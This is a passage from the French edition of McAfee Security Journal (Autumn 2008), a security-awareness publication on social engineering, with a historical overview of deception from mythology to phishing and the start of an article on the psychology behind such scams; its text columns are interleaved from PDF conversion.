Vous êtes sur la page 1sur 48

Point de vue sur la sécurité — par McAfee® Avert® Labs Automne 2008

INGÉNIERIE SOCIALE
La principale menace de
sécurité au monde

CHEVAUX DE TROIE, fraude aux


clics et promesses d'argent facile
ne sont que quelques-unes des
tactiques exploitées par les auteurs
de logiciels malveillants pour piéger
les internautes
McAfee Security Journal
Automne 2008

Sommaire Rédacteur en chef


Dan Sommer

Rédaction
Anthony Bettini
Hiep Dang
Benjamin Edelman
Elodie Grandjean
4 Les origines de l'ingénierie sociale Du cheval de Troie de l'Odyssée au Jeff Green
phishing sur Internet : la tromperie à l'épreuve du temps Hiep Dang Aditya Kapoor
Rahul Kashyap
Markus Jacobsson
9 Demandez et vous recevrez Les raisons psychologiques du succès de
Karthik Raman
l'ingénierie sociale Karthik Raman
Craig Schmugar
13 L'ingénierie sociale sur le Web : que nous réserve l’avenir ? Statistiques
La fraude aux clics compte sans doute parmi les menaces auxquelles nous Toralv Dirro
devrons faire face à l'avenir. Markus Jakobsson Shane Keats
David Marcus
16 Les Jeux Olympiques de Pékin : une cible de choix pour les logiciels François Paget
d'ingénierie sociale A l'instar d'autres événements marquants, les JO sont un Craig Schmugar
terrain de jeu irrésistible pour les auteurs de malwares. Elodie Grandjean
Illustrateur
22 Les vulnérabilités des marchés boursiers Les pirates peuvent-ils s'enrichir Doug Ross
grâce aux correctifs de Microsoft et à la falsification de l'actualité de sociétés ?
Anthony Bettini Graphisme
PAIR Design, LLC
28 L'avenir des sites de réseau social Les sommes d'argent colossales en jeu et
Remerciements
le nombre croissant d'inscrits font des sites de réseau social une cible alléchante
De nombreuses personnes ont contribué à
pour les auteurs de logiciels malveillants. Craig Schmugar la création de ce numéro de McAfee
Security Journal. Nous tenons à tous les
31 Le nouveau souffle des vulnérabilités Les techniques d'ingénierie sociale remercier et profitons de l'occasion pour
exposent les utilisateurs aux failles béantes des logiciels. Rahul Kashyap saluer nommément nos principaux
contributeurs : les cadres dirigeants de
34 Typosquatting: les itinéraires inattendus de la navigation sur Internet McAfee, Inc. et McAfee Avert Labs qui ont
L'internaute peu attentif doit s'attendre à l'inattendu. Benjamin Edelman encouragé et soutenu la création de ce
journal ; nos réviseurs Carl Banzhof, Hiep
38 Qu'est-il donc arrivé aux logiciels espions et aux logiciels publicitaires ? Dang, David Marcus, Craig Schmugar,
Un renforcement de la législation a peut-être permis de dompter les logiciels Anna Stepanov et Joe Telafici ; nos
espions, mais les programmes potentiellement indésirables et les chevaux de auteurs, leurs supérieurs et collègues qui
Troie n'ont pas dit leur dernier mot. Aditya Kapoor les ont assistés par leurs idées et
commentaires ; les experts en marketing
44 Statistiques Quel niveau de risque pour les domaines de premier niveau ? Cari Jaquet, Mary Karlton, Beth Martinez
et Jennifer Natwick ; notre chargé de
David Marcus
relations publiques Joris Evers et son
équipe internationale, ainsi que Red
Consultancy Ltd. ; notre agence de
graphisme Pair Design ; notre imprimeur
RR Donnelley ; Derrick Healy et ses
collègues du bureau de localisation de
Cork en Irlande, qui ont traduit cette
publication dans de nombreuses langues.
Cette publication n'aurait pas été possible
sans leur inestimable contribution.

Dan Sommer
Rédacteur en chef

Vous avez apprécié ce numéro ? Certaines


choses vous ont déplu ? Envoyez-nous
vos commentaires par e-mail à l'adresse
Security_Journal@mcafee.com.
Les débuts du journal
de la sécurité McAfee
Jeff Green

Nous sommes heureux de vous présenter le premier Nous commencerons par nous pencher sur le passé, avec
numéro de McAfee Security Journal. En réalité, il ne s'agit pas un bref exposé sur la tromperie à travers les âges. Ensuite,
à strictement parler d'un premier numéro, puisque nous avons nous examinerons les éléments de psychologie qui expliquent
rebaptisé la publication intitulée, suivant les pays, McAfee Sage/ la réussite de l'ingénierie sociale. Notre troisième article se
Global Threat Report — en français, Point global sur les menaces. projettera dans l'avenir et envisagera l'évolution probable de
Notre McAfee Security Journal présente le même point de vue l'ingénierie sociale au cours des prochaines années. Au lendemain
sans détour et le même contenu dynamique que vous attendez des Jeux Olympiques 2008 de Pékin, nous analyserons les
désormais des meilleurs chercheurs et auteurs dans le domaine stratagèmes encore une fois imaginés par les auteurs de logiciels
de la sécurité informatique : les experts de McAfee® Avert® malveillants pour amener les amateurs de sport à visiter des
Labs. Dans ce numéro, nous nous pencherons sur le vecteur de sites web factices. Est-il possible de gagner en bourse en tablant
menaces le plus insidieux et répandu : l'ingénierie sociale. sur des événements tels que le jour de diffusion des correctifs
mensuels Microsoft ou en créant de faux articles d'actualité
Pour un Tibet libre ! Nouvelles images de la 3e guerre
d'entreprises ? Nos recherches de pointe ont permis de répondre
mondiale ! Les meilleures astuces pour évader le fisc !
à ces questions. Quel est l'avenir des sites de réseau social ? Leur
Nouvelles technologies pour économiser l'énergie ! Achetez
sécurité sera-t-elle renforcée, ou sont-ils voués à rester des proies
des médicaments bon marché en ligne !
faciles à cause de la trop grande crédulité de leurs utilisateurs ?
La liste est loin d'être exhaustive, mais les exemples illustrent Nous nous pencherons aussi sur la façon dont les auteurs de
bien notre propos. Pour parvenir à leurs fins, les auteurs de logiciels malveillants tirent parti des vulnérabilités des logiciels et
logiciels malveillants (malwares) et les spécialistes de l'usurpation du typosquatting, qui consiste à exploiter les fautes de frappe
d'identité doivent créer des messages attirants et efficaces, dans les requêtes de page web. Notre dernier article fournit
bien plus que par le passé. Les arnaques par ingénierie sociale, un aperçu historique des logiciels publicitaires (adwares) et des
toutefois, sont loin de constituer une nouveauté. Elles sont aussi logiciels espions (spywares). Enfin, diverses statistiques vous
vieilles que la communication humaine elle-même. « Tu possèdes permettront d'apprécier les différents degrés de risque auxquels
une chose que je convoite. Je vais essayer de te convaincre de sont exposés les domaines de premier niveau de par le monde.
me la donner ou d'agir comme je le souhaite. » L'ingénierie
Nous espérons que vous trouverez ce numéro aussi captivant et
sociale est probablement la menace la plus difficile à contrer en
propice à la réflexion qu'il l'a été pour nous. Merci de vous joindre
raison du facteur humain. La façon la plus facile de dérober les
à nous pour explorer les arcanes de la sécurité informatique.
informations d'identité d'une personne est sans doute de lui
demander tout simplement de vous les fournir.
Les techniques d'ingénierie sociale (qu'il s'agisse de chaînes de
Ponzi, de systèmes de pyramides, d'impostures, d'escroqueries, de
Jeff Green est Vice-Président directeur de McAfee
phishing ou de spam) se conforment toutes à un même modèle.
Avert Labs et du département Développement de
Certaines de ces attaques sont physiques, d'autres numériques,
produits. Il est responsable à l'échelle mondiale de
mais elles ont toutes des éléments en commun. Elles poursuivent le
tous les centres de recherche de McAfee, établis sur
même objectif et utilisent souvent les mêmes techniques. Elles visent
les continents américain, européen et asiatique. Jeff
toutes à manipuler leurs victimes en exploitant une faiblesse de la
Green est à la tête des équipes de recherche sur les
nature humaine, Elles créent des scénarios conçus pour persuader la
différents types de menaces (virus, attaques ciblées
victime de dévoiler des informations ou d'accomplir une action.
et par piratage, logiciels espions, spam et attaques
Pour la rédaction de ce numéro, nous avons fait appel à par phishing), sur les vulnérabilités et les patches,
d'éminents chercheurs et auteurs afin qu'ils analysent et illustrent ainsi que sur les technologies de détection et de
ce thème à votre intention. Ce numéro constitue en outre une prévention des intrusions sur l'hôte et sur le réseau.
véritable première puisque des contributeurs invités ont également Il dirige également la recherche à long terme, qui
participé à sa création. Remercions donc à cet égard deux noms permet à McAfee de conserver une longueur
prestigieux : Markus Jacobsson du Palo Alto Research Center et d'avance sur les menaces émergentes.
Benjamin Edelman, professeur à la Harvard Business School.

AUTOMNE 2008 3
Les origines de
l'ingénierie sociale
Hiep Dang

A l'heure actuelle, il est rare de lire un article d'actualité ou un


ouvrage consacré à la sécurité informatique sans tomber plusieurs
fois sur l'expression ingénierie sociale.
Rendue populaire par Kevin Mitnick (sans doute le plus tristement d'ingénierie sociale, Prométhée se joua à nouveau de Zeus et
célèbre représentant de l'ingénierie sociale de l'ère informatique lui « ayant dérobé une portion splendide du feu inextinguible,
moderne), l'ingénierie sociale est l'art de persuasion ultime : elle qu'il cacha dans une férule creuse » à partir du Mont Olympe,
tente de convaincre les individus de dévoiler des informations il le remit aux mortels. En guise de punition, Prométhée fut
confidentielles et d'agir d'une certaine manière. Bien que enchaîné à un rocher et condamné à voir chaque jour un aigle se
cette expression « ingénierie sociale » soit contemporaine, ses repaître de son foie, lequel renaissait nuit après nuit. Zeus infligea
techniques et philosophies sous-jacentes existent depuis l'aube également un châtiment aux hommes : il créa la première femme,
de l'humanité. Des récits de tromperie et de manipulation se Pandore, et avec elle, une jarre. Piquée par la curiosité, elle ouvrit
retrouvent dans l'histoire, le folklore, la mythologie, la religion cette dernière, qui libéra sur-le-champ d'innombrables maux.
et la littérature.

L'attaque par phishing, selon Jacob et Rebecca


Prométhée : dieu de l'ingénierie sociale ? L'Ancien Testament nous conte l'histoire de Jacob et de sa mère,
Rebecca. Ceux-ci eurent recours à une technique d'ingénierie
D'après la mythologie grecque, le talent des hommes pour sociale qui a jeté les bases des attaques par phishing modernes,
l'ingénierie sociale leur vient probablement de Prométhée, qui où la victime pense être abordée par quelqu'un d'autre que
était tellement versé dans cet art qu'il parvint à tromper Zeus l'auteur de l'attaque. Isaac, père de Jacob et époux de Rebecca,
lui-même. Dans la Théogonie et Les travaux et les jours, le poète devint aveugle à la fin de sa vie. Alors qu'il se préparait à la mort,
épique Hésiode raconte l'histoire de Prométhée, un Titan connu il demanda à son aîné, Esaü : « chasse-moi du gibier, fais-moi
pour sa ruse et ses fourberies. Selon la légende, il aurait par un mets comme j'aime, et apporte-le-moi à manger, afin que
ailleurs créé l'Homme à partir d'une motte d'argile. Prométhée mon âme te bénisse avant que je meure ». (Genèse 27:2–4)
fit une démonstration célèbre de sa ruse à Mécone, en offrant Souhaitant que Jacob reçoive la bénédiction d'Isaac à la place
à Zeus un choix pour régler un différend opposant les dieux et d'Esaü, Rebecca mit au point un plan. Jacob fut d'abord
les mortels. L'une des offrandes proposées était un estomac hésitant : « Esaü, mon frère, est velu, et je n'ai point de poil.
de bœuf rempli de viande ; l'autre était constituée des os de Peut-être mon père me touchera-t-il, et je passerai à ses yeux
l'animal recouverts d'une graisse épaisse. La première était donc pour un menteur, et je ferai venir sur moi la malédiction, et non
de la nourriture sous le couvert d'une enveloppe répugnante, la bénédiction. » (Genèse 27:11–12) Pour tromper Isaac en lui
tandis que l'autre était immangeable mais rendue attirante par faisant croire qu'il était aux côtés d'Esaü, Rebecca prépara le
une apparence alléchante. Zeus choisit la seconde offrande : repas d'Isaac, para Jacob des plus beaux atours d'Esaü et attacha
les hommes purent ainsi se contenter d'offrir aux dieux des une peau de chèvre aux mains et au cou glabres de Jacob. Ce
sacrifices faits d'os et de graisse, et garder la viande pour eux. dernier apporta le mets à Isaac, passa le test d'authentification et
Zeus, furieux d'avoir été trompé par Prométhée, punit les mortels reçu la bénédiction qui revenait à Esaü.
en leur refusant le feu. Mais, au cours d'un autre épisode

4 McAFEE SECURITY JOURNAL


Samson et Dalila : espionnage sous contrat
« 0 Troie ! ô ville malheureuse ! Citoyens insensés, que faites-vous ?
Samson était un personnage biblique d'une force extraordinaire Croyez-vous qu'en effet les Grecs soient loin de nous,
qui combattit les Philistins. Le secret de sa puissance résidait dans Que même leurs présents soient exempts d'artifice ?
sa longue chevelure. Alors qu'il était à Gaza, Samson tomba
Ignorez-vous leur fourbe, ignorez-vous Ulysse ?
amoureux de Dalila. Mais les Philistins parvinrent à convaincre la
Ou les Grecs sont cachés dans ces vastes contours ?
belle de leur dévoiler le secret de la force de Samson en lui offrant
Ou ce colosse altier, qui domine nos tours,
1 100 pièces d'argent. « Flatte-le, pour savoir d'où lui vient sa
vient observer Pergame ; ou l'affreuse machine,
grande force et comment nous pourrions nous rendre maîtres de
De nos murs imprudents médite la ruine.
lui ; nous le lierons pour le dompter, et nous te donnerons chacun
mille et cent sicles d'argent. » (Juges 16:5) Samson résista avant Craignez les Grecs, craignez leurs présents désastreux :
de succomber à la force persuasive de Dalila et finit par lui révéler Les dons d'un ennemi sont toujours dangereux. »
son secret. Elle lui dit : « Comment peux-tu dire : Je t'aime !
puisque ton cœur n'est pas avec moi ? Voilà trois fois que tu Le manque de discernement des Troyens précipita leur chute.
t'es joué de moi, et tu ne m'as pas déclaré d'où vient ta grande Cette nuit-là, sous le commandement d'Ulysse, les soldats grecs
force. » Comme chaque jour, elle tourmentait et l'importunait dissimulés dans le cheval tuèrent les gardes et ouvrirent les
par ses questions, il finit par abandonner toute résistance, et lui portes de la ville au reste de leur armée. Grâce à l'habile tactique
dit : « Le rasoir n'a point passé sur ma tête ; parce que je suis d'ingénierie sociale mise au point par Ulysse, les Grecs eurent
consacré à Dieu dès le ventre de ma mère. Si j'étais rasé, ma force raison des Troyens et gagnèrent la guerre.
m'abandonnerait ; je deviendrais faible, et je serais comme tout
autre homme. » (Juges 16:15-17) Peu après qu'il tomba endormi,
Dalila exploita sa vulnérabilité en lui rasant les cheveux. Les
Le cheval de Troie d'aujourd'hui
Philistins profitèrent de la faiblesse de Samson pour lui crever les Lorsqu'Ulysse ourdit son plan d'infiltration de Troie, il ne
yeux et l'enchaîner, puis le condamnèrent à la prison à vie. s'attendait pas à créer un précédent pour les millénaires à venir.
De nos jours, le type de logiciel malveillant (malware) le plus
répandu dans le monde, le « cheval de Troie » électronique, a été
Le premier cheval de Troie baptisé ainsi par Daniel Edwards de la National Security Agency
Rendu célèbre par deux poètes épiques, le Grec Homère dans son (NSA) durant les années 1970, en référence à la technique
Odyssée et le Romain Virgile dans son Enéide, l'épisode du cheval d'ingénierie sociale utilisée par les Grecs. Avant l'ère d'Internet,
de Troie fut l'une des ruses d'ingénierie sociale les plus habiles de les utilisateurs qui souhaitaient partager des fichiers recouraient
l'histoire de l'humanité. Au cours de la Guerre de Troie, les Grecs pour cela à des supports physiques (tels que disquettes
ne parvenaient pas à renverser les murailles qui entouraient la ou lecteurs de bande) ou se connectaient à des systèmes
cité troyenne. Astucieux, le guerrier grec Ulysse mit au point une d'information télématiques (BBS). Les pirates informatiques
ruse pour leurrer les Troyens en leur faisant croire que les Grecs ont vite réalisé qu'ils pouvaient les inciter à exécuter du code
avaient cessé leur assaut de la ville. Les bateaux de la flotte hellène malveillant en donnant à ce dernier l'apparence d'un jeu ou
quittèrent les côtes, et seuls un grand cheval de bois et un soldat d'un utilitaire. La simplicité et l'efficacité incroyable des chevaux
grec nommé Sinon restèrent sur la plage. Après avoir été capturé de Troie font que les auteurs de logiciels malveillants ont encore
par les Troyens, Sinon leur raconta que les Grecs avaient laissé un recours à cette technique d'ingénierie sociale plusieurs décennies
immense cheval de bois en guise d'offrande aux dieux, afin que plus tard. Aujourd'hui, le nombre d'utilisateurs de PC qui,
ces derniers les protègent lors de leur voyage de retour, et qu'ils tombant dans les multiples pièges tendus, se laissent infecter par
l'avaient fait gigantesque pour qu'il ne puisse pas être emmené à des chevaux de Troie croît de façon alarmante : ils ne peuvent
Troie, sans quoi ils risquaient de s'attirer le mauvais sort. La tentation résister à de la musique, des vidéos et des logiciels gratuits, ou
était trop grande pour les Troyens, qui trainèrent le majestueux encore aux cartes de vœux électroniques de personnes qu'ils ne
animal à l'intérieur de leurs murs et ce, malgré les avertissements de connaissent pourtant ni d'Eve ni d'Adam.
Cassandre, condamnée à prononcer des prophéties toujours vraies
mais auxquelles personne ne croirait jamais, et ceux de Laocoön,
prêtre troyen, qui s'exclamait dans l'Enéide :

AUTOMNE 2008 5
Croissance des logiciels malveillants et des programmes potentiellement indésirables (PUP)
Familles, de 1997 à 2007 en milliers

140
130 Virus et robots
120 Chevaux de Troie
Programmes
110 potentiellement
indésirables
100
90
80 Figure 1 : La fréquence de
publication de fichiers de
70 signatures de McAfee destinés
spécifiquement aux logiciels
60 malveillants et aux programmes
potentiellement indésirables
50 a connu plusieurs pics cette
dernière décennie. En 1998, les
40
générateurs de virus ont fait
leur apparition. Entre 2003 et
30
2004, les mass-mailers se sont
20 répandus. Entre 2004 et 2005,
les réseaux de robots (botnets)
10 étaient en hausse. Et entre 2006
et 2007, les chevaux de Troie ont
0 connu une croissance fulgurante.
1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007

Une escroquerie remise au goût du jour


La fraude nigériane, également appelée fraude 419, existe extrêmement fortuné avait besoin d'aide pour être libéré. Le
depuis plusieurs décennies et demeure l'un des types de spam soi-disant détenu comptait sur l'auteur de la supercherie afin
les plus prolifiques. Le nombre « 419 » fait référence à la section de récolter suffisamment d'argent pour être relaxé. L'arnaqueur
du code pénal nigérian qui condamne cette arnaque. Cette abordait la victime et lui « offrait la possibilité » de participer à la
tactique d'ingénierie sociale qui mise sur la promesse d'argent collecte de fonds, avec la promesse de réaliser d'importants gains
facile se présente sous la forme de lettres, dont les premières financiers. De nos jours, la lettre compte de nombreuses variantes
ont été remises dans des boîtes aux lettres postales au cours des mais le concept demeure le même. La fraude nigériane vise à
années 1970. L'escroquerie a ensuite évolué : les télécopies non faire miroiter des gains mirobolants pour un « investissement »
sollicitées envoyées durant les années 1980 ont cédé la place des plus modiques. Bien que la plupart des destinataires de la
aux e-mails, qui constituent la méthode de propagation presque lettre se rendent compte que l'offre est trop belle pour être vraie,
exclusivement utilisée de nos jours. L'origine de cette tromperie on estime que 1 % d'entre eux y répondent. D'après les services
remonte au 16e siècle ; elle était alors nommée « arnaque du secrets américains, les arnaqueurs parviennent ainsi à extorquer à
prisonnier espagnol ». Le procédé est simple : on jouait sur la leurs victimes cent millions de dollars en moyenne par an.
naïveté de la victime en prétendant qu'un prisonnier espagnol

6 McAFEE SECURITY JOURNAL


Tentatives de phishing signalées
En milliers

60

Tentatives de phishing
50
individuelles signalées

40 Nouveaux sites
de phishing

30

Figure 2 : Les tentatives de


20
phishing signalées augmentent de
façon constante, mais le nombre
10 de nouveaux sites de phishing
a littéralement explosé ces deux
dernières années. (Source : Anti-
0 Phishing Working Group)

Nov. Mai Nov. Mai Nov. Mai Nov. Mai Nov.


2003 2004 2004 2005 2005 2006 2006 2007 2007

Phishing
Le terme « phishing » (hameçonnage) est une invention numéros, les escrocs ont commencé à rechercher des noms
des pirates informatiques. Il a été forgé par analogie avec le d'utilisateur et mots de passe réels pour attaquer les réseaux du
terme anglais « fishing » (qui signifie « pêche ») du fait que fournisseur de services. Ils se sont mis à envoyer de faux e-mails
la technique d'ingénierie sociale utilise un leurre pour amener et messages instantanés semblant provenir du support technique
les victimes à dévoiler leurs noms d'utilisateur, mots de passe, d'AOL. De nombreuses victimes peu méfiantes ont révélé leurs
numéros de carte de crédit et autres informations personnelles. informations de compte, et les activités et achats réalisés par
Dans les années 1990, de nombreux pirates informatiques les pirates à l'aide de leurs comptes compromis leur ont été
ont exploité les offres d'essai gratuites de services Internet facturés. Ces malfaiteurs n'ont pas mis longtemps à se rendre
d'AOL (America Online) en utilisant des numéros de carte de compte des plantureux profits à la clé et du taux de réussite de
crédit factices, générés automatiquement, qui en réalité ne ce type d'attaque : ils se sont mis à cibler des sociétés (banques,
correspondaient pas aux comptes existants. Après qu'AOL a eBay, Amazon et d'autres) spécialisées dans les transactions et le
renforcé ses mécanismes de sécurité et amélioré ses tests de commerce en ligne.
validation des cartes de crédit pour garantir la légitimité des

AUTOMNE 2008 7
Sécurité informatique : petite perspective historique

Les chevaux de Troie McAfee Avert Labs devient la


font leur apparition sur première équipe d'intervention
les BBS. d'urgence contre les virus à
ARPANET (précurseur d'Internet) Internet est constitué à l'échelle mondiale.
est créé. partir d'ARPANET. La première attaque par phishing est
Le spam, ou courrier non sollicité, lancée pour dérober les mots de
Creeper (le premier virus apparaît peu après qu'Internet passe des utilisateurs AOL.
informatique) est déployé devient accessible au grand public. Aujourd'hui, McAfee Avert Labs garantit une
sur le réseau ARPANET. protection contre les virus, les vers, les
Frederick Cohen publie l'ouvrage
John von Neumann publie sa « Experiments with Computer chevaux de Troie, les logiciels espions, les
théorie des automates Viruses » (Expériences sur les virus programmes potentiellement indésirables,
autoréplicateurs. informatiques) et attribue à Leonard l'exploitation des vulnérabilités, le spam, le
Adleman l'invention du terme phishing, les domaines malveillants, ainsi que
« virus informatique ». les intrusions sur l'hôte et le réseau.

1948 1965 1969 1971 1978 1980 1982 1983 1984 1986 1988 1995 1996 2000 2002 2008

Le ver Morris (le premier


ver à se répliquer
Elk Cloner (le premier automatiquement) fait
virus sur Apple) est mis en son apparition.
circulation. Kevin Mitnick publie « The Art of
La messagerie Le premier système Brain (le premier virus Deception » (L'art de la
électronique est créée. d'information télématique sur PC) apparaît. tromperie), qui décrit ses talents
(BBS) est mis au point. en matière d'ingénierie sociale.

John Draper (surnommé Captain Le film « War Games » montre Les termes « spyware » (logiciel
Crunch) découvre qu'un sifflet à l'écran les conséquences du espion) et « adware » (logiciel
offert en cadeau dans une boîte de piratage informatique. publicitaire) commencent à
céréales peut être utilisé pour se répandre.
pirater des réseaux téléphoniques
(phreaking).

Figure 3 : Chronologie des événements marquants de l'ingénierie sociale

L'histoire se répète
Quel que soit le terme employé — ingénierie sociale, tromperie,
escroquerie, exploitation des biais cognitifs ou arnaque —, le
procédé qui vise à abuser de la naïveté et de la confiance d'un Hiep Dang est Directeur des recherches sur la lutte
contre les logiciels malveillants au sein de McAfee
individu est vieux comme le monde. Les experts en sécurité Avert Labs. Il est chargé de la coordination de
s'accordent à dire que l'homme est le maillon faible de la chaîne l'équipe mondiale des experts en logiciels malveillants
de la sécurité. Nous pouvons développer les logiciels les plus sûrs de McAfee, spécialisés dans la recherche sur les
pour protéger les ordinateurs, mettre en œuvre les stratégies de attaques de malwares (notamment les virus, les
sécurité les plus restrictives ou déployer tous les efforts possibles vers, les chevaux de Troie, les robots et les logiciels
espions), leur analyse et l'élaboration de réponses.
pour sensibiliser les utilisateurs : tant que nous agirons sous M. Dang contribue régulièrement à la rédaction des
le coup de la curiosité et de la cupidité, sans tenir compte des livres blancs et des articles de blog d'Avert Labs, et
conséquences éventuelles, nous risquons de revivre un nouveau il participe également à la rédaction de McAfee
cauchemar semblable à la tragédie du cheval de Troie. Security Journal. Il a été interviewé par le Wall Street
Journal, MSNBC, PC Magazine, et de nombreuses
Le progrès ne tient pas au changement : il dépend de la capacité autres publications et médias au sujet des tendances
à le rendre durable. Quand le changement est absolu, il ne reste des menaces et programmes malveillants. Hiep Dang
plus aucune possibilité d'amélioration et aucune orientation est également un fervent pratiquant du Tai Chi et du
d'amélioration n'est définie : et quand les leçons tirées de Kung Fu du style de la mante religieuse ou Tang Lang
Quan. Il a actuellement mis entre parenthèses ses
l'expérience ne sont pas retenues, comme parmi les sauvages, séances d'entraînement pour focaliser ses énergies sur
l'enfance perdure. Ceux qui ne peuvent pas se souvenir du la sécurité informatique.
passé sont condamnés à le répéter. — George Santayana,
volume « Reason in Common Sense » de « The Life of Reason »

OUVRAGES CITÉS
t Anderson J.P., Computer Security Technology Planning Study, vol. II (Etude sur la t Homère, L'Odyssée, (traduction de C. M. Leconte de Lisle)
planification des technologies de sécurité informatique), US Air Force, 1972 t Mitnick K., The Art of Deception (L'art de la supercherie), Indianapolis, Wiley Publishing
t Farquhar M., A Treasury of Deception (Histoire de la tromperie), New York, t Myers M. J., Phishing and Countermeasures (Phishing et contremesures), John
The Penguin Group Wiley & Sons, Inc., 2007
t Hésiode, Théogonie (traduction de C. M. Leconte de Lisle, 1869) t Santayana G., The Life of Reason (La vie de la raison), 1905
t Hésiode, Les travaux et les jours (traduction de C. M. Leconte de Lisle, 1869) t Virgile, L'Enéide, 19 av. J.-C. (traduction de Jacques Delille)

8 McAFEE SECURITY JOURNAL


Demandez et
vous recevrez
Karthik Raman

En janvier 2007, des cybercriminels ont eu recours à des tactiques d'ingénierie


sociale pour réaliser la plus grosse arnaque en ligne de tous les temps, dérobant près
de 900 000 euros (1,1 million de dollars) aux clients de la banque suédoise Nordea.
Les clients de Nordea ont reçu un e-mail semblant provenir de la Deux cerveaux en un
banque, et 250 d'entre eux ont téléchargé puis installé le soi-disant
logiciel « antispam » préconisé par l'e-mail. En réalité, ce logiciel Selon certains, le cerveau de l'Homme est le système le plus
n'était autre qu'un cheval de Troie qui collectait des informations complexe présent dans l'univers. Cela est dû en partie à la
sur les clients, à l'aide desquelles les escrocs se connectaient au site complexité de sa structure et des interactions entre ses sous-
web de la banque pour ensuite vider les comptes bancaires1. systèmes extrêmement intriqués.
Selon un principe de sécurité bien connu, l'homme est le maillon Dans le cerveau, les émotions semblent émaner de zones internes
faible de tout système de sécurité. Bien que les attaques de et anciennes, telles que l'amygdale, alors que le raisonnement
sécurité et les mécanismes de défense développés pour y faire face est contrôlé par des parties externes, plus récentes, telles que le
ne cessent d'évoluer, la nature humaine quant à elle ne change néocortex3. Toutefois, les sièges des émotions et de la raison ne
pas. Une attaque par ingénierie sociale est bien plus efficace et se s'excluent pas mutuellement, comme Isaac Asimov le souligne
révèle lucrative plus rapidement pour son auteur qu'une attaque dans son livre The Human Brain4 :
en force, qui l'oblige à craquer des algorithmes de chiffrement, à
dénicher de nouvelles vulnérabilités logicielles ou à inventer des Il semblerait que les émotions n'émanent pas d'une
logiciels malveillants toujours plus complexes. Lors de la fraude quelconque partie minuscule du cerveau, mais bien de
perpétrée contre Nordea, il a été plus simple pour les malfaiteurs plusieurs zones, notamment les lobes frontal et temporal du
d'inviter les clients de la banque à installer un cheval de Troie que cortex, par un mécanisme complexe d'actions réciproques.
de forcer un coffre-fort pour y dérober de l'argent. Les parties du cerveau qui gèrent l'émotion et la raison peuvent
Notre crédulité, notre cupidité et notre curiosité nous rend parfois collaborer ou être en conflit. C'est pourquoi nous
facilement manipulables, et l'ingénierie sociale exploite éprouvons des difficultés à dissocier l'émotion de la raison, et
précisément nos sentiments et notre manière de penser. Les pourquoi la première l'emporte facilement sur la seconde lorsque
spécialistes en ingénierie sociale demandent des renseignements les deux s'opposent.
ou invitent l'utilisateur à effectuer une action, et bien souvent, Voyons à présent comment nous gérons la peur par exemple.
ils font mouche. Mais pourquoi ? Lors de son analyse de nos réactions face à un danger imminent,
Lors de ses travaux précurseurs sur la psychologie de la sécurité, l'auteur scientifique Steven Johnson précise que la réponse
l'expert de renom Bruce Schneier a identifié quatre pôles de à la peur s'effectue selon « une combinaison harmonieuse
recherche : l'économie comportementale, la psychologie de d'instruments physiologiques qui interviennent avec une précision
la décision, la psychologie du risque et la neuroscience. Ceux- et une rapidité remarquables5 :
ci permettent d'expliquer plus facilement les raisons pour
lesquelles notre perception de la sécurité diverge de la réalité2. Ce En langage courant, nous appelons cette réaction « le combat
numéro de McAfee Security Journal et cet article en particulier ou la fuite ». La sensation de sa manifestation est l'une des
se concentrent sur l'un des aspects de la sécurité : l'ingénierie meilleures façons de prendre conscience que le cerveau et le
sociale. Notre analyse portera sur la neuroscience, la psychologie corps peuvent opérer comme un système autonome, en toute
de la décision et des notions élémentaires de psychologie sociale, indépendance de la volonté consciente.
afin de déterminer comment les individus ne perçoivent pas la
manipulation et tombent dans les pièges de l'ingénierie sociale.

AUTOMNE 2008 9
Lorsque nous revivons la situation ayant entraîné le combat
ou la fuite par le passé, nous laissons la réponse émotionnelle
Les politiciens malhonnêtes, les espions et
reprendre le contrôle, bien que notre raison nous pousse
objectivement à rejeter son bien-fondé. les escrocs savent que jouer sur l'émotion
Les politiciens malhonnêtes, les espions et les escrocs savent que — en particulier sur la peur — pour susciter
jouer sur l'émotion — en particulier sur la peur — pour susciter
une réaction affective est un moyen très
une réaction affective est un moyen très efficace de parvenir à
leurs fins. L'ingénierie sociale s'inscrit dans cette optique. efficace de parvenir à leurs fins. L'ingénierie
sociale s'inscrit dans cette optique.
Théories au sujet de l'ingénierie sociale
Manipulation des émotions Il ne faut nullement nous attendre à pouvoir reconnaître et
analyser tous les aspects de chaque individu, événement et
De nombreux virtuoses de l'ingénierie sociale exercent une
situation que nous rencontrons au quotidien. Nous n'en avons
manipulation mentale, en tirant parti de la peur, la curiosité, la
ni le temps, ni l'énergie, ni la capacité. Nous devons par contre
cupidité et l'empathie de leurs proies. Il est établi qu'il s'agit là de
souvent recourir à nos stéréotypes, nos règles empiriques, pour
sentiments universels : nous les éprouvons tous un jour ou l'autre.
classer les choses selon quelques caractéristiques clés, afin de
La peur et la curiosité sont utiles dans de nombreuses situations. réagir spontanément lorsque l'un ou l'autre de ces éléments
Par exemple, la peur nous incite heureusement à nous échapper déclencheurs se présentent.
d'un immeuble en feu. Quant à la curiosité, elle peut nous
pousser à nous lancer des défis et à chercher à en apprendre Voyons à présent comment les experts en ingénierie sociale
toujours davantage. Cependant, lorsque nos actes sont dictés peuvent susciter en nous ce type de réactions automatiques
par la peur ou la curiosité, leurs conséquences peuvent être dont ils tireront profit.
indésirables voire dangereuses6.
Certaines attaques exploitant l'ingénierie sociale peuvent être
Déclenchement de biais cognitifs
lancées même sans que leur auteur ne soit présent sur les lieux Un biais cognitif est une erreur mentale résultant de la
pour exploiter la curiosité des victimes potentielles. En avril 2007, simplification d'une stratégie de traitement de l'information10.
des clés USB infectées par un cheval de Troie ciblant les banques Lorsqu'une heuristique fonctionne mal, elle conduit à un biais.
avaient été déposées dans un parking londonien. Les curieux L'ingénierie sociale bouscule nos heuristiques pour créer des
désireux de connaître le contenu de ces clés — et probablement erreurs « graves et systématiques11.
ravis de prendre gratuitement possession d'un périphérique de Certains biais cognitifs qui peuvent expliquer la réussite de
stockage — ont branché celles-ci à leurs ordinateurs, avec pour procédés d'ingénierie sociale sont décrits ci-dessous :
seul résultat de voir ce dernier infecté par un logiciel malveillant7.
t Biais de validation décisionnelle Le souvenir d'un choix que
Les auteurs d'attaques qui menacent ou font chanter leurs l'on a effectué antérieurement lui attribue des aspects positifs
victimes exploitent leur peur. Le cheval de Troie GPCoder.i, qui plus importants que ses aspects négatifs12. Un internaute peut
a fait son apparition en juin 2008, est un exemple de logiciel s'habituer à acheter des articles avec remise sur des sites de
